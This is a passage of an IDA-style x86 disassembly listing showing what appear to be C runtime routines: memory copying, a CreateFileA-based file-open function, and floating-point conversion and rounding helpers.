jb short loc_41D238
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_41D238+4[eax*4]
; ---------------------------------------------------------------------------
loc_41D238: ; CODE XREF: sub_41D050+1DA�j
; DATA XREF: sub_41D050+1E1�r
jmp ds:off_41D338[ecx*4]
; ---------------------------------------------------------------------------
align 10h
dd offset loc_41D24C
dd offset loc_41D270
; ---------------------------------------------------------------------------
cwde
rol byte ptr [ecx+0], cl
loc_41D24C: ; DATA XREF: sub_41D050+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_41D214
std
rep movsd
cld
jmp ds:off_41D338[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41D270: ; DATA XREF: sub_41D050+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_41D214
std
rep movsd
cld
jmp ds:off_41D338[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_41D214
std
rep movsd
cld
jmp ds:off_41D338[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41D2EC
dd offset loc_41D2F4
; ---------------------------------------------------------------------------
cld
rol byte ptr [ecx+0], cl
add al, 0D3h
inc ecx
add [ebx+edx*8], cl
inc ecx
add [ebx+edx*8], dl
inc ecx
add [ebx+edx*8], bl
inc ecx
loc_41D2E7: ; DATA XREF: sub_41D050+1C6�r
add [edi], ch
rol dword ptr [ecx+0], cl
loc_41D2EC: ; DATA XREF: sub_41D050+27C�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41D2F4: ; DATA XREF: sub_41D050+280�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41D32F: ; CODE XREF: sub_41D050+1C6�j
jmp ds:off_41D338[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41D338 dd offset loc_41D348 ; DATA XREF: sub_41D050+1BB�r
; sub_41D050:loc_41D238�r ...
dd offset loc_41D350
dd offset loc_41D360
dd offset loc_41D374
; ---------------------------------------------------------------------------
loc_41D348: ; CODE XREF: sub_41D050+1BB�j
; sub_41D050:loc_41D238�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41D350: ; CODE XREF: sub_41D050+1BB�j
; sub_41D050:loc_41D238�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41D360: ; CODE XREF: sub_41D050+1BB�j
; sub_41D050:loc_41D238�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D374: ; CODE XREF: sub_41D050+1BB�j
; sub_41D050:loc_41D238�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_41D050 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D38D proc near ; CODE XREF: sub_41D674+28�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
mov edx, [ebp+arg_C]
push ebx
push esi
xor esi, esi
test dl, dl
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], esi
jns short loc_41D3B1
mov [ebp+var_14], esi
mov [ebp+var_1], 10h
jmp short loc_41D3BC
; ---------------------------------------------------------------------------
loc_41D3B1: ; CODE XREF: sub_41D38D+19�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_41D3BC: ; CODE XREF: sub_41D38D+22�j
mov eax, 8000h
test edx, eax
jnz short loc_41D3D6
test dh, 40h
jnz short loc_41D3D2
cmp dword_47C600, eax
jz short loc_41D3D6
loc_41D3D2: ; CODE XREF: sub_41D38D+3B�j
or [ebp+var_1], 80h
loc_41D3D6: ; CODE XREF: sub_41D38D+36�j
; sub_41D38D+43�j
push 3
mov eax, edx
pop ebx
and eax, ebx
sub eax, esi
jz short loc_41D3F9
dec eax
jz short loc_41D3F0
dec eax
jnz short loc_41D414
mov [ebp+var_10], 0C0000000h
jmp short loc_41D400
; ---------------------------------------------------------------------------
loc_41D3F0: ; CODE XREF: sub_41D38D+55�j
mov [ebp+var_10], 40000000h
jmp short loc_41D400
; ---------------------------------------------------------------------------
loc_41D3F9: ; CODE XREF: sub_41D38D+52�j
mov [ebp+var_10], 80000000h
loc_41D400: ; CODE XREF: sub_41D38D+61�j
; sub_41D38D+6A�j
cmp ecx, 10h
jz short loc_41D445
cmp ecx, 20h
jz short loc_41D43C
cmp ecx, 30h
jz short loc_41D433
cmp ecx, 40h
jz short loc_41D42E
loc_41D414: ; CODE XREF: sub_41D38D+58�j
call sub_419430
mov dword ptr [eax], 16h
call sub_419439
mov [eax], esi
or eax, 0FFFFFFFFh
jmp loc_41D625
; ---------------------------------------------------------------------------
loc_41D42E: ; CODE XREF: sub_41D38D+85�j
mov [ebp+var_8], ebx
jmp short loc_41D448
; ---------------------------------------------------------------------------
loc_41D433: ; CODE XREF: sub_41D38D+80�j
mov [ebp+var_8], 2
jmp short loc_41D448
; ---------------------------------------------------------------------------
loc_41D43C: ; CODE XREF: sub_41D38D+7B�j
mov [ebp+var_8], 1
jmp short loc_41D448
; ---------------------------------------------------------------------------
loc_41D445: ; CODE XREF: sub_41D38D+76�j
mov [ebp+var_8], esi
loc_41D448: ; CODE XREF: sub_41D38D+A4�j
; sub_41D38D+AD�j ...
mov eax, edx
mov edx, 700h
and eax, edx
mov ecx, 400h
cmp eax, ecx
push edi
mov edi, 100h
jg short loc_41D48F
jz short loc_41D48A
cmp eax, esi
jz short loc_41D48A
cmp eax, edi
jz short loc_41D481
cmp eax, 200h
jz short loc_41D4BB
cmp eax, 300h
jnz short loc_41D4A1
mov [ebp+var_C], 2
jmp short loc_41D4CB
; ---------------------------------------------------------------------------
loc_41D481: ; CODE XREF: sub_41D38D+DB�j
mov [ebp+var_C], 4
jmp short loc_41D4CB
; ---------------------------------------------------------------------------
loc_41D48A: ; CODE XREF: sub_41D38D+D3�j
; sub_41D38D+D7�j
mov [ebp+var_C], ebx
jmp short loc_41D4CB
; ---------------------------------------------------------------------------
loc_41D48F: ; CODE XREF: sub_41D38D+D1�j
cmp eax, 500h
jz short loc_41D4C4
cmp eax, 600h
jz short loc_41D4BB
cmp eax, edx
jz short loc_41D4C4
loc_41D4A1: ; CODE XREF: sub_41D38D+E9�j
call sub_419430
mov dword ptr [eax], 16h
call sub_419439
mov [eax], esi
loc_41D4B3: ; CODE XREF: sub_41D38D+2E2�j
or eax, 0FFFFFFFFh
jmp loc_41D624
; ---------------------------------------------------------------------------
loc_41D4BB: ; CODE XREF: sub_41D38D+E2�j
; sub_41D38D+10E�j
mov [ebp+var_C], 5
jmp short loc_41D4CB
; ---------------------------------------------------------------------------
loc_41D4C4: ; CODE XREF: sub_41D38D+107�j
; sub_41D38D+112�j
mov [ebp+var_C], 1
loc_41D4CB: ; CODE XREF: sub_41D38D+F2�j
; sub_41D38D+FB�j ...
mov eax, [ebp+arg_C]
test eax, edi
mov esi, 80h
jz short loc_41D4E9
mov ecx, dword_47C1C0
not ecx
and ecx, [ebp+arg_10]
test cl, cl
js short loc_41D4E9
xor esi, esi
inc esi
loc_41D4E9: ; CODE XREF: sub_41D38D+148�j
; sub_41D38D+157�j
test al, 40h
jz short loc_41D504
or byte ptr [ebp+var_10+2], 1
or esi, 4000000h
cmp dword_47C1C4, 2
jnz short loc_41D504
or [ebp+var_8], 4
loc_41D504: ; CODE XREF: sub_41D38D+15E�j
; sub_41D38D+171�j
test ah, 10h
jz short loc_41D50B
or esi, edi
loc_41D50B: ; CODE XREF: sub_41D38D+17A�j
test al, 20h
jz short loc_41D517
or esi, 8000000h
jmp short loc_41D521
; ---------------------------------------------------------------------------
loc_41D517: ; CODE XREF: sub_41D38D+180�j
test al, 10h
jz short loc_41D521
or esi, 10000000h
loc_41D521: ; CODE XREF: sub_41D38D+188�j
; sub_41D38D+18C�j
call sub_41CC21
mov edi, eax
or ebx, 0FFFFFFFFh
cmp edi, ebx
jnz short loc_41D549
call sub_419430
mov dword ptr [eax], 18h
call sub_419439
and dword ptr [eax], 0
loc_41D542: ; CODE XREF: sub_41D38D+208�j
mov eax, ebx
jmp loc_41D624
; ---------------------------------------------------------------------------
loc_41D549: ; CODE XREF: sub_41D38D+1A0�j
mov eax, [ebp+arg_0]
push 0
push esi
push [ebp+var_C]
mov dword ptr [eax], 1
mov eax, [ebp+arg_4]
mov [eax], edi
lea eax, [ebp+var_1C]
push eax
push [ebp+var_8]
push [ebp+var_10]
push [ebp+arg_8]
call ds:dword_420044 ; CreateFileA
mov esi, eax
cmp esi, ebx
jz short loc_41D588
push esi
call ds:dword_4201D0 ; GetFileType
test eax, eax
jnz short loc_41D597
push esi
call ds:dword_42003C ; CloseHandle
loc_41D588: ; CODE XREF: sub_41D38D+1E7�j
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
call sub_419442
pop ecx
jmp short loc_41D542
; ---------------------------------------------------------------------------
loc_41D597: ; CODE XREF: sub_41D38D+1F2�j
cmp eax, 2
jnz short loc_41D5A2
or [ebp+var_1], 40h
jmp short loc_41D5AB
; ---------------------------------------------------------------------------
loc_41D5A2: ; CODE XREF: sub_41D38D+20D�j
cmp eax, 3
jnz short loc_41D5AB
or [ebp+var_1], 8
loc_41D5AB: ; CODE XREF: sub_41D38D+213�j
; sub_41D38D+218�j
push esi
push edi
call sub_41CA50
or [ebp+var_1], 1
mov eax, edi
sar eax, 5
lea ebx, ds:47C640h[eax*4]
mov eax, edi
and eax, 1Fh
lea esi, [eax+eax*8]
mov al, [ebp+var_1]
pop ecx
pop ecx
mov ecx, [ebx]
shl esi, 2
mov [ebp+var_1], al
and [ebp+var_1], 48h
mov [esi+ecx+4], al
jnz short loc_41D60D
test al, al
jns short loc_41D60D
test byte ptr [ebp+arg_C], 2
jz short loc_41D60D
push 2
push 0FFFFFFFFh
push edi
call sub_41B178
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_41D629
call sub_419439
cmp dword ptr [eax], 83h
jnz short loc_41D668
loc_41D60D: ; CODE XREF: sub_41D38D+252�j
; sub_41D38D+256�j ...
cmp [ebp+var_1], 0
jnz short loc_41D622
test byte ptr [ebp+arg_C], 8
jz short loc_41D622
mov eax, [ebx]
lea eax, [esi+eax+4]
or byte ptr [eax], 20h
loc_41D622: ; CODE XREF: sub_41D38D+284�j
; sub_41D38D+28A�j
mov eax, edi
loc_41D624: ; CODE XREF: sub_41D38D+129�j
; sub_41D38D+1B7�j
pop edi
loc_41D625: ; CODE XREF: sub_41D38D+9C�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41D629: ; CODE XREF: sub_41D38D+271�j
and [ebp+var_2], 0
push 1
lea eax, [ebp+var_2]
push eax
push edi
call sub_418CEA
add esp, 0Ch
test eax, eax
jnz short loc_41D656
cmp [ebp+var_2], 1Ah
jnz short loc_41D656
push [ebp+var_10]
push edi
call sub_41E49E
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_41D668
loc_41D656: ; CODE XREF: sub_41D38D+2B1�j
; sub_41D38D+2B7�j
push 0
push 0
push edi
call sub_41B178
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_41D60D
loc_41D668: ; CODE XREF: sub_41D38D+27E�j
; sub_41D38D+2C7�j
push edi
call sub_417AB9
pop ecx
jmp loc_41D4B3
sub_41D38D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D674 proc near ; CODE XREF: sub_4192C8+137�p
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 14h
push offset stru_429AA0
call __SEH_prolog
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
mov ecx, [ebp+arg_8]
call sub_41D38D
add esp, 14h
mov [ebp+var_24], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41D6B9
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_41D674 endp
; =============== S U B R O U T I N E =======================================
sub_41D6B9 proc near ; CODE XREF: sub_41D674+37�p
; DATA XREF: .rdata:stru_429AA0�o
cmp dword ptr [ebp-1Ch], 0
jz short locret_41D6C8
push dword ptr [ebp-20h]
call sub_41CBFF
pop ecx
locret_41D6C8: ; CODE XREF: sub_41D6B9+4�j
retn
sub_41D6B9 endp
; =============== S U B R O U T I N E =======================================
sub_41D6C9 proc near ; CODE XREF: sub_41D748+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push 20h
pop ecx
cdq
idiv ecx
push 1Fh
pop ecx
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
mov ecx, [esp+arg_0]
not edx
test [ecx+eax*4], edx
jz short loc_41D6F1
loc_41D6E8: ; CODE XREF: sub_41D6C9+26�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41D6EB: ; CODE XREF: sub_41D6C9+2C�j
cmp dword ptr [ecx+eax*4], 0
jnz short loc_41D6E8
loc_41D6F1: ; CODE XREF: sub_41D6C9+1D�j
inc eax
cmp eax, 3
jl short loc_41D6EB
xor eax, eax
inc eax
retn
sub_41D6C9 endp
; =============== S U B R O U T I N E =======================================
sub_41D6FB proc near ; CODE XREF: sub_41D748+42�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push edi
push 20h
pop ecx
cdq
idiv ecx
mov edi, [esp+8+arg_0]
mov esi, eax
lea eax, [edi+esi*4]
push eax
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
push edx
push dword ptr [eax]
call sub_41E5D9
add esp, 0Ch
dec esi
js short loc_41D745
lea edi, [edi+esi*4]
loc_41D72C: ; CODE XREF: sub_41D6FB+48�j
test eax, eax
jz short loc_41D745
push edi
push 1
push dword ptr [edi]
call sub_41E5D9
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_41D72C
loc_41D745: ; CODE XREF: sub_41D6FB+2C�j
; sub_41D6FB+33�j
pop edi
pop esi
retn
sub_41D6FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D748 proc near ; CODE XREF: sub_41D869+79�p
; sub_41D869+C2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
dec edi
push 20h
lea eax, [edi+1]
pop ecx
cdq
idiv ecx
push 1Fh
pop esi
sub esi, edx
xor edx, edx
inc edx
mov ecx, esi
shl edx, cl
mov ebx, eax
mov eax, [ebp+arg_0]
test [eax+ebx*4], edx
jz short loc_41D797
lea ecx, [edi+1]
push ecx
push eax
call sub_41D6C9
test eax, eax
pop ecx
pop ecx
jnz short loc_41D794
push edi
push [ebp+arg_0]
call sub_41D6FB
pop ecx
pop ecx
mov [ebp+var_4], eax
loc_41D794: ; CODE XREF: sub_41D748+3C�j
mov eax, [ebp+arg_0]
loc_41D797: ; CODE XREF: sub_41D748+2C�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax+ebx*4], edx
inc ebx
cmp ebx, ecx
jge short loc_41D7B2
lea edi, [eax+ebx*4]
sub ecx, ebx
xor eax, eax
rep stosd
loc_41D7B2: ; CODE XREF: sub_41D748+5F�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41D748 endp
; =============== S U B R O U T I N E =======================================
sub_41D7BA proc near ; CODE XREF: sub_41D869+6D�p
; sub_41D869+AC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push 3
pop edx
sub ecx, eax
push esi
loc_41D7C8: ; CODE XREF: sub_41D7BA+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_41D7C8
pop esi
retn
sub_41D7BA endp
; =============== S U B R O U T I N E =======================================
sub_41D7D5 proc near ; CODE XREF: sub_41D869+4D�p
arg_0 = dword ptr 4
xor eax, eax
loc_41D7D7: ; CODE XREF: sub_41D7D5+10�j
mov ecx, [esp+arg_0]
cmp dword ptr [ecx+eax*4], 0
jnz short loc_41D7EB
inc eax
cmp eax, 3
jl short loc_41D7D7
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41D7EB: ; CODE XREF: sub_41D7D5+A�j
xor eax, eax
retn
sub_41D7D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D7EE proc near ; CODE XREF: sub_41D869+B6�p
; sub_41D869+D0�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
pop esi
cdq
mov ecx, esi
idiv ecx
mov ebx, [ebp+arg_0]
or edi, 0FFFFFFFFh
mov [ebp+arg_4], esi
mov ecx, edx
shl edi, cl
mov [ebp+var_8], eax
xor eax, eax
sub [ebp+arg_4], edx
not edi
mov [ebp+var_4], eax
loc_41D81C: ; CODE XREF: sub_41D7EE+51�j
mov esi, [ebx+eax*4]
mov ecx, esi
and ecx, edi
mov [ebp+var_C], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+arg_4]
or esi, [ebp+var_4]
mov [ebx+eax*4], esi
mov esi, [ebp+var_C]
shl esi, cl
inc eax
cmp eax, 3
mov [ebp+var_4], esi
jl short loc_41D81C
push 2
pop eax
mov ecx, eax
sub ecx, [ebp+var_8]
lea ecx, [ebx+ecx*4]
loc_41D84C: ; CODE XREF: sub_41D7EE+74�j
cmp eax, [ebp+var_8]
jl short loc_41D858
mov edx, [ecx]
mov [ebx+eax*4], edx
jmp short loc_41D85C
; ---------------------------------------------------------------------------
loc_41D858: ; CODE XREF: sub_41D7EE+61�j
and dword ptr [ebx+eax*4], 0
loc_41D85C: ; CODE XREF: sub_41D7EE+68�j
dec eax
sub ecx, 4
test eax, eax
jge short loc_41D84C
pop edi
pop esi
pop ebx
leave
retn
sub_41D7EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D869 proc near ; CODE XREF: sub_41D9C1+D�p
; sub_41D9D7+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
shl eax, 10h
and edi, 7FFFh
sub edi, 3FFFh
cmp edi, 0FFFFC001h
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
mov [ebp+var_8], ecx
push eax
jnz short loc_41D8D2
xor ebx, ebx
call sub_41D7D5
test eax, eax
pop ecx
jnz loc_41D981
lea edi, [ebp+var_C]
stosd
stosd
stosd
loc_41D8CA: ; CODE XREF: sub_41D869+DA�j
push 2
pop eax
jmp loc_41D983
; ---------------------------------------------------------------------------
loc_41D8D2: ; CODE XREF: sub_41D869+49�j
lea eax, [ebp+var_18]
push eax
call sub_41D7BA
push dword ptr [esi+8]
lea eax, [ebp+var_C]
push eax
call sub_41D748
add esp, 10h
test eax, eax
jz short loc_41D8EF
inc edi
loc_41D8EF: ; CODE XREF: sub_41D869+83�j
mov eax, [esi+4]
mov ecx, eax
sub ecx, [esi+8]
cmp edi, ecx
jge short loc_41D905
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosd
stosd
jmp short loc_41D941
; ---------------------------------------------------------------------------
loc_41D905: ; CODE XREF: sub_41D869+90�j
cmp edi, eax
jg short loc_41D945
sub eax, edi
mov edi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41D7BA
lea eax, [ebp+var_C]
push edi
push eax
call sub_41D7EE
push dword ptr [esi+8]
lea eax, [ebp+var_C]
push eax
call sub_41D748
mov eax, [esi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_41D7EE
add esp, 20h
loc_41D941: ; CODE XREF: sub_41D869+9A�j
xor ebx, ebx
jmp short loc_41D8CA
; ---------------------------------------------------------------------------
loc_41D945: ; CODE XREF: sub_41D869+9E�j
cmp edi, [esi]
push dword ptr [esi+0Ch]
jl short loc_41D96D
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosd
stosd
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_41D7EE
mov ebx, [esi+14h]
add ebx, [esi]
pop ecx
xor eax, eax
pop ecx
inc eax
jmp short loc_41D983
; ---------------------------------------------------------------------------
loc_41D96D: ; CODE XREF: sub_41D869+E1�j
mov ebx, [esi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add ebx, edi
call sub_41D7EE
pop ecx
pop ecx
loc_41D981: ; CODE XREF: sub_41D869+55�j
xor eax, eax
loc_41D983: ; CODE XREF: sub_41D869+64�j
; sub_41D869+102�j
push 1Fh
pop ecx
sub ecx, [esi+0Ch]
mov esi, [esi+10h]
shl ebx, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
or ebx, [ebp+var_C]
cmp esi, 40h
jnz short loc_41D9B2
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_41D9BC
; ---------------------------------------------------------------------------
loc_41D9B2: ; CODE XREF: sub_41D869+13A�j
cmp esi, 20h
jnz short loc_41D9BC
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_41D9BC: ; CODE XREF: sub_41D869+147�j
; sub_41D869+14C�j
pop edi
pop esi
pop ebx
leave
retn
sub_41D869 endp
; =============== S U B R O U T I N E =======================================
sub_41D9C1 proc near ; CODE XREF: sub_41D9ED+2E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_42E220
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41D869
add esp, 0Ch
retn
sub_41D9C1 endp
; =============== S U B R O U T I N E =======================================
sub_41D9D7 proc near ; CODE XREF: sub_41DA30+2E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_42E238
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41D869
add esp, 0Ch
retn
sub_41D9D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D9ED proc near ; CODE XREF: sub_419678+12�p
var_14 = byte ptr -14h
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_42DEB8
xor eax, [ebp+4]
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_14]
push eax
call sub_41E797
push [ebp+arg_0]
lea eax, [ebp+var_14]
push eax
call sub_41D9C1
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 24h
call sub_41A026
leave
retn
sub_41D9ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DA30 proc near ; CODE XREF: sub_419678+2D�p
var_14 = byte ptr -14h
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_42DEB8
xor eax, [ebp+4]
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_14]
push eax
call sub_41E797
push [ebp+arg_0]
lea eax, [ebp+var_14]
push eax
call sub_41D9D7
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 24h
call sub_41A026
leave
retn
sub_41DA30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DA73 proc near ; CODE XREF: sub_419781+4D�p
; sub_419891+41�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
mov ecx, [edx+0Ch]
push ebx
mov ebx, [ebp+arg_4]
test ebx, ebx
push esi
mov esi, [ebp+arg_0]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
mov eax, edi
jle short loc_41DAB0
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_41DA96: ; CODE XREF: sub_41DA73+38�j
mov dl, [ecx]
test dl, dl
jz short loc_41DAA2
movsx edx, dl
inc ecx
jmp short loc_41DAA5
; ---------------------------------------------------------------------------
loc_41DAA2: ; CODE XREF: sub_41DA73+27�j
push 30h
pop edx
loc_41DAA5: ; CODE XREF: sub_41DA73+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_41DA96
mov edx, [ebp+arg_8]
loc_41DAB0: ; CODE XREF: sub_41DA73+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_41DAC9
cmp byte ptr [ecx], 35h
jl short loc_41DAC9
jmp short loc_41DAC1
; ---------------------------------------------------------------------------
loc_41DABE: ; CODE XREF: sub_41DA73+52�j
mov byte ptr [eax], 30h
loc_41DAC1: ; CODE XREF: sub_41DA73+49�j
dec eax
cmp byte ptr [eax], 39h
jz short loc_41DABE
inc byte ptr [eax]
loc_41DAC9: ; CODE XREF: sub_41DA73+42�j
; sub_41DA73+47�j
cmp byte ptr [esi], 31h
jnz short loc_41DAD3
inc dword ptr [edx+4]
jmp short loc_41DAE5
; ---------------------------------------------------------------------------
loc_41DAD3: ; CODE XREF: sub_41DA73+59�j
push edi
call sub_4177F0
inc eax
push eax
push edi
push esi
call sub_41D050
add esp, 10h
loc_41DAE5: ; CODE XREF: sub_41DA73+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41DA73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DAEA proc near ; CODE XREF: sub_41DBA4+1B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov ax, [edx+6]
push ebx
push esi
push edi
mov edi, 7FFh
mov esi, 80000000h
mov [ebp+var_4], esi
mov ecx, eax
shr ecx, 4
and eax, 8000h
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
and eax, 0FFFFFh
test ebx, ebx
jz short loc_41DB3A
cmp ebx, edi
jz short loc_41DB33
lea edi, [ecx+3C00h]
jmp short loc_41DB5B
; ---------------------------------------------------------------------------
loc_41DB33: ; CODE XREF: sub_41DAEA+3F�j
mov edi, 7FFFh
jmp short loc_41DB5B
; ---------------------------------------------------------------------------
loc_41DB3A: ; CODE XREF: sub_41DAEA+3B�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_41DB52
cmp edx, ebx
jnz short loc_41DB52
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_41DB9F
; ---------------------------------------------------------------------------
loc_41DB52: ; CODE XREF: sub_41DAEA+54�j
; sub_41DAEA+58�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_41DB5B: ; CODE XREF: sub_41DAEA+47�j
; sub_41DAEA+4E�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
or ecx, [ebp+var_4]
mov eax, [ebp+arg_0]
shl edx, 0Bh
test ecx, esi
mov [eax+4], ecx
mov [eax], edx
